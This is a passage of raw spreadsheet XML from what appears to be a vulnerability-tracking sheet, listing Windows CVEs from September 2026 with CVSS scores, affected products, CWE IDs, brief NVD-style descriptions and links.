t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t></is></c></row><row r="587"><c r="A587" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B587" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C587" s="5" t="inlineStr"><is><t>CVE-2026-71337</t></is></c><c r="D587" s="5" t="n"><v>7.8</v></c><c r="E587" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F587" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G587" s="5" t="inlineStr" /><c r="H587" s="5" t="n"><v>0.003</v></c><c r="I587" s="5" t="inlineStr" /><c r="J587" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K587" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L587" s="5" t="inlineStr" /><c r="M587" s="5" t="inlineStr" /><c r="N587" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P587" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q587" s="5" t="inlineStr" /><c r="R587" s="5" t="inlineStr"><is><t>CWE-121, CWE-130</t></is></c><c r="S587" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T587" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t></is></c></row><row r="588"><c r="A588" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B588" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C588" s="5" t="inlineStr"><is><t>CVE-2026-71343</t></is></c><c r="D588" s="5" t="n"><v>7.8</v></c><c r="E588" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F588" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G588" s="5" t="inlineStr" /><c r="H588" s="5" t="n"><v>0.003</v></c><c r="I588" s="5" t="inlineStr" /><c r="J588" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K58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8" s="5" t="inlineStr" /><c r="M588" s="5" t="inlineStr" /><c r="N588" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O588" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P588" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q588" s="5" t="inlineStr" /><c r="R588" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S588" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t></is></c><c r="T588" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t></is></c></row><row r="589"><c r="A589" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B589" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C589" s="5" t="inlineStr"><is><t>CVE-2026-71345</t></is></c><c r="D589" s="5" t="n"><v>7.8</v></c><c r="E589" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F589" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G589" s="5" t="inlineStr" /><c r="H589" s="5" t="n"><v>0.003</v></c><c r="I589" s="5" t="inlineStr" /><c r="J589" s="5" t="inlineStr" /><c r="K589" s="5" t="inlineStr" /><c r="L589" s="5" t="inlineStr" /><c r="M589" s="5" t="inlineStr" /><c r="N589" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O589" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P589" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q589" s="5" t="inlineStr" /><c r="R589" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S589" s="5" t="inlineStr"><is><t>Out-of-bounds write in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="T589" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71345</t></is></c></row><row r="590"><c r="A590" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B590" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C590" s="5" t="inlineStr"><is><t>CVE-2026-72929</t></is></c><c r="D590" s="5" t="n"><v>7.8</v></c><c r="E590" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F590" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G590" s="5" t="inlineStr" /><c r="H590" s="5" t="n"><v>0.002</v></c><c r="I590" s="5" t="inlineStr" /><c r="J590" s="5" t="inlineStr" /><c r="K590" s="5" t="inlineStr" /><c r="L590" s="5" t="inlineStr" /><c r="M590" s="5" t="inlineStr" /><c r="N590" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O590" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P590" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q590" s="5" t="inlineStr" /><c r="R590" s="5" t="inlineStr"><is><t>CWE-354</t></is></c><c r="S590" s="5" t="inlineStr"><is><t>Improper validation of integrity check value in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T590" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72929</t></is></c></row><row r="591"><c r="A591" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B591" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C591" s="5" t="inlineStr"><is><t>CVE-2026-72941</t></is></c><c r="D591" s="5" t="n"><v>7.8</v></c><c r="E591" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F591" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G591" s="5" t="inlineStr" /><c r="H591" s="5" t="n"><v>0.003</v></c><c r="I591" s="5" t="inlineStr" /><c r="J591" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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1" s="5" t="inlineStr" /><c r="M591" s="5" t="inlineStr" /><c r="N591" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O591" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P591" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q591" s="5" t="inlineStr" /><c r="R591" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S591" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T591" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t></is></c></row><row r="592"><c r="A592" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B592" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C592" s="5" t="inlineStr"><is><t>CVE-2026-72944</t></is></c><c r="D592" s="5" t="n"><v>7.8</v></c><c r="E592" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F592" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G592" s="5" t="inlineStr" /><c r="H592" s="5" t="n"><v>0.003</v></c><c r="I592" s="5" t="inlineStr" /><c r="J592" s="5" t="inlineStr" /><c r="K592" s="5" t="inlineStr" /><c r="L592" s="5" t="inlineStr" /><c r="M592" s="5" t="inlineStr" /><c r="N592" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O592" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P592" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q592" s="5" t="inlineStr" /><c r="R592" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S592" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T592" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72944</t></is></c></row><row r="593"><c r="A593" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B593" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C593" s="5" t="inlineStr"><is><t>CVE-2026-72946</t></is></c><c r="D593" s="5" t="n"><v>7.8</v></c><c r="E593" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F593" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G593" s="5" t="inlineStr" /><c r="H593" s="5" t="n"><v>0.003</v></c><c r="I593" s="5" t="inlineStr" /><c r="J593" s="5" t="inlineStr" /><c r="K593" s="5" t="inlineStr" /><c r="L593" s="5" t="inlineStr" /><c r="M593" s="5" t="inlineStr" /><c r="N593" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P593" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q593" s="5" t="inlineStr" /><c r="R593" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S593" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Storage Port Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T593" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72946</t></is></c></row><row r="594"><c r="A594" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B594" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C594" s="5" t="inlineStr"><is><t>CVE-2026-72953</t></is></c><c r="D594" s="5" t="n"><v>7.8</v></c><c r="E594" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F594" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G594" s="5" t="inlineStr" /><c r="H594" s="5" t="n"><v>0.003</v></c><c r="I594" s="5" t="inlineStr" /><c r="J594" s="5" t="inlineStr" /><c r="K594" s="5" t="inlineStr" /><c r="L594" s="5" t="inlineStr" /><c r="M594" s="5" t="inlineStr" /><c r="N594" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P594" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q594" s="5" t="inlineStr" /><c r="R594" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S594" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T594" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72953</t></is></c></row><row r="595"><c r="A595" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B595" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C595" s="5" t="inlineStr"><is><t>CVE-2026-72957</t></is></c><c r="D595" s="5" t="n"><v>7.8</v></c><c r="E595" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F595" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G595" s="5" t="inlineStr" /><c r="H595" s="5" t="n"><v>0.003</v></c><c r="I595" s="5" t="inlineStr" /><c r="J595" s="5" t="inlineStr" /><c r="K595" s="5" t="inlineStr" /><c r="L595" s="5" t="inlineStr" /><c r="M595" s="5" t="inlineStr" /><c r="N595" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O595" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P595" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q595" s="5" t="inlineStr" /><c r="R595" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S595" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Deployment Services allows an authorized attacker to execute code locally.</t></is></c><c r="T595" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72957</t></is></c></row><row r="596"><c r="A596" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B596" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C596" s="5" t="inlineStr"><is><t>CVE-2026-72965</t></is></c><c r="D596" s="5" t="n"><v>7.8</v></c><c r="E596" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F596" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G596" s="5" t="inlineStr" /><c r="H596" s="5" t="n"><v>0.003</v></c><c r="I596" s="5" t="inlineStr" /><c r="J596" s="5" t="inlineStr" /><c r="K596" s="5" t="inlineStr" /><c r="L596" s="5" t="inlineStr" /><c r="M596" s="5" t="inlineStr" /><c r="N596" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q596" s="5" t="inlineStr" /><c r="R596" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S596" s="5" t="inlineStr"><is><t>Use after free in Windows WebClient Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T596" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72965</t></is></c></row><row r="597"><c r="A597" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B597" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C597" s="5" t="inlineStr"><is><t>CVE-2026-72967</t></is></c><c r="D597" s="5" t="n"><v>7.8</v></c><c r="E597" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F597" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G597" s="5" t="inlineStr" /><c r="H597" s="5" t="n"><v>0.003</v></c><c r="I597" s="5" t="inlineStr" /><c r="J597" s="5" t="inlineStr" /><c r="K597" s="5" t="inlineStr" /><c r="L597" s="5" t="inlineStr" /><c r="M597" s="5" t="inlineStr" /><c r="N597" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O597" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P597" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q597" s="5" t="inlineStr" /><c r="R597" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S597" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Network Connection Broker allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T597" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72967</t></is></c></row><row r="598"><c r="A598" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B598" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C598" s="5" t="inlineStr"><is><t>CVE-2026-72988</t></is></c><c r="D598" s="5" t="n"><v>7.8</v></c><c r="E598" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F598" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G598" s="5" t="inlineStr" /><c r="H598" s="5" t="n"><v>0.002</v></c><c r="I598" s="5" t="inlineStr" /><c r="J598" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K59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8" s="5" t="inlineStr" /><c r="M598" s="5" t="inlineStr" /><c r="N598" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P598" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q598" s="5" t="inlineStr" /><c r="R598" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S598" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T598" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t></is></c></row><row r="599"><c r="A599" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B599" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C599" s="5" t="inlineStr"><is><t>CVE-2026-72990</t></is></c><c r="D599" s="5" t="n"><v>7.8</v></c><c r="E599" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F599" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G599" s="5" t="inlineStr" /><c r="H599" s="5" t="n"><v>0.003</v></c><c r="I599" s="5" t="inlineStr" /><c r="J599" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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9" s="5" t="inlineStr" /><c r="M599" s="5" t="inlineStr" /><c r="N599" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O599" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P599" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q599" s="5" t="inlineStr" /><c r="R599" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S599" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T599" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t></is></c></row><row r="600"><c r="A600" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B600" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C600" s="5" t="inlineStr"><is><t>CVE-2026-72991</t></is></c><c r="D600" s="5" t="n"><v>7.8</v></c><c r="E600" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F600" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G600" s="5" t="inlineStr" /><c r="H600" s="5" t="n"><v>0.003</v></c><c r="I600" s="5" t="inlineStr" /><c r="J600" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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0" s="5" t="inlineStr" /><c r="M600" s="5" t="inlineStr" /><c r="N600" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P600" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q600" s="5" t="inlineStr" /><c r="R600" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S600" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T600" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t></is></c></row><row r="601"><c r="A601" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B601" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C601" s="5" t="inlineStr"><is><t>CVE-2026-72992</t></is></c><c r="D601" s="5" t="n"><v>7.8</v></c><c r="E601" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F601" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G601" s="5" t="inlineStr" /><c r="H601" s="5" t="n"><v>0.003</v></c><c r="I601" s="5" t="inlineStr" /><c r="J601" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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1" s="5" t="inlineStr" /><c r="M601" s="5" t="inlineStr" /><c r="N601" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O601" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P601" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q601" s="5" t="inlineStr" /><c r="R601" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S601" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T601" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t></is></c></row><row r="602"><c r="A602" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B602" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C602" s="5" t="inlineStr"><is><t>CVE-2026-72993</t></is></c><c r="D602" s="5" t="n"><v>7.8</v></c><c r="E602" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F602" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G602" s="5" t="inlineStr" /><c r="H602" s="5" t="n"><v>0.002</v></c><c r="I602" s="5" t="inlineStr" /><c r="J602" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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2" s="5" t="inlineStr" /><c r="M602" s="5" t="inlineStr" /><c r="N602" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P602" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q602" s="5" t="inlineStr" /><c r="R602" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S602" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T602" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t></is></c></row><row r="603"><c r="A603" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B603" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C603" s="5" t="inlineStr"><is><t>CVE-2026-72994</t></is></c><c r="D603" s="5" t="n"><v>7.8</v></c><c r="E603" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F603" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G603" s="5" t="inlineStr" /><c r="H603" s="5" t="n"><v>0.002</v></c><c r="I603" s="5" t="inlineStr" /><c r="J603" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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3" s="5" t="inlineStr" /><c r="M603" s="5" t="inlineStr" /><c r="N603" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P603" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q603" s="5" t="inlineStr" /><c r="R603" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S603" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T603" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t></is></c></row><row r="604"><c r="A604" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B604" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C604" s="5" t="inlineStr"><is><t>CVE-2026-72995</t></is></c><c r="D604" s="5" t="n"><v>7.8</v></c><c r="E604" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F604" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G604" s="5" t="inlineStr" /><c r="H604" s="5" t="n"><v>0.002</v></c><c r="I604" s="5" t="inlineStr" /><c r="J604" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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4" s="5" t="inlineStr" /><c r="M604" s="5" t="inlineStr" /><c r="N604" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O604" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P604" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q604" s="5" t="inlineStr" /><c r="R604" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S604" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T604" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t></is></c></row><row r="605"><c r="A605" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B605" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C605" s="5" t="inlineStr"><is><t>CVE-2026-72996</t></is></c><c r="D605" s="5" t="n"><v>7.8</v></c><c r="E605" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F605" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G605" s="5" t="inlineStr" /><c r="H605" s="5" t="n"><v>0.003</v></c><c r="I605" s="5" t="inlineStr" /><c r="J605" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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5" s="5" t="inlineStr" /><c r="M605" s="5" t="inlineStr" /><c r="N605" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P605" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q605" s="5" t="inlineStr" /><c r="R605" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S605" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T605" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t></is></c></row><row r="606"><c r="A606" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B606" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C606" s="5" t="inlineStr"><is><t>CVE-2026-72997</t></is></c><c r="D606" s="5" t="n"><v>7.8</v></c><c r="E606" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F606" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G606" s="5" t="inlineStr" /><c r="H606" s="5" t="n"><v>0.003</v></c><c r="I606" s="5" t="inlineStr" /><c r="J606" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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6" s="5" t="inlineStr" /><c r="M606" s="5" t="inlineStr" /><c r="N606" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P606" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q606" s="5" t="inlineStr" /><c r="R606" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S606" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T606" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t></is></c></row><row r="607"><c r="A607" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B607" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C607" s="5" t="inlineStr"><is><t>CVE-2026-73000</t></is></c><c r="D607" s="5" t="n"><v>7.8</v></c><c r="E607" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F607" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G607" s="5" t="inlineStr" /><c r="H607" s="5" t="n"><v>0.002</v></c><c r="I607" s="5" t="inlineStr" /><c r="J607" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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7" s="5" t="inlineStr" /><c r="M607" s="5" t="inlineStr" /><c r="N607" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O607" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P607" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q607" s="5" t="inlineStr" /><c r="R607" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S607" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T607" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t></is></c></row><row r="608"><c r="A608" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B608" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C608" s="5" t="inlineStr"><is><t>CVE-2026-73001</t></is></c><c r="D608" s="5" t="n"><v>7.8</v></c><c r="E608" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F608" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G608" s="5" t="inlineStr" /><c r="H608" s="5" t="n"><v>0.003</v></c><c r="I608" s="5" t="inlineStr" /><c r="J608" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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8" s="5" t="inlineStr" /><c r="M608" s="5" t="inlineStr" /><c r="N608" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O608" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P608" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q608" s="5" t="inlineStr" /><c r="R608" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S608" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T608" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t></is></c></row><row r="609"><c r="A609" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B609" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C609" s="5" t="inlineStr"><is><t>CVE-2026-73002</t></is></c><c r="D609" s="5" t="n"><v>7.8</v></c><c r="E609" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F609" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G609" s="5" t="inlineStr" /><c r="H609" s="5" t="n"><v>0.002</v></c><c r="I609" s="5" t="inlineStr" /><c r="J609" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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9" s="5" t="inlineStr" /><c r="M609" s="5" t="inlineStr" /><c r="N609" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O609" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P609" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q609" s="5" t="inlineStr" /><c r="R609" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S609" s="5" t="inlineStr"><is><t>Integer overflow 